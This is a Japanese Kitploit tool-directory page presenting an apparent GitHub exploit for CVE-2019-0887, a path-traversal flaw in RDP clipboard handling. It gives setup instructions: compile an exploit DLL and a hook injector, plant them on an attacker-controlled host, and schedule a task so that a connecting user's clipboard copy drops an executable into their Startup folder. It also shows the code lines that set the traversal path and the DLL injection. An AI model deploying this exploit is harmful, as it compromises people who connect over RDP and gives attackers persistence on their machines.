Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-0887 — CVE-2019-0887 用の exp | Kitploit
ツール/GitHubGitHub/t43wiu6/cve-2019-0887
特権昇格永続化メカニズムエクスプロイト横移動ポストエクスプロイトペイロード開発バイナリエクスプロイト
GitHubt43wiu6/cve-2019-0887

CVE-2019-0887

CVE-2019-0887 用の exp

リポジトリを見る
1895年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-0887

CVE-2019-0887 をコンパイルし、winhlp.dll にリネームします

Install_Hook をコンパイルし、hook.exe にリネームします

注意: これらは x64 でコンパイルする必要があります

その後、悪意のあるシステムに次のように配置します

root@kitploit:~
c:\windows\hook.exe
c:\windows\winhlp.dll

c:\windows\winhlp64.exe # something evil 

パスを変更したい場合は、ここがポイントです

root@kitploit:~
# CVE-2019-0887/dllmain.cpp
WCHAR  evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR  efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };

# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");

おそらく taskschd.msc を使用してタスクプランを作成し、トリガーを「ユーザーセッションへの接続時」に設定し、hook.exe のファイルパスを設定します。

誰かが私の悪意のあるシステムに接続して何かをコピーするのを待って、pwn する...

ヒント: DLL ハイジャックを使ってみてはどうでしょうか?

ツールをダウンロード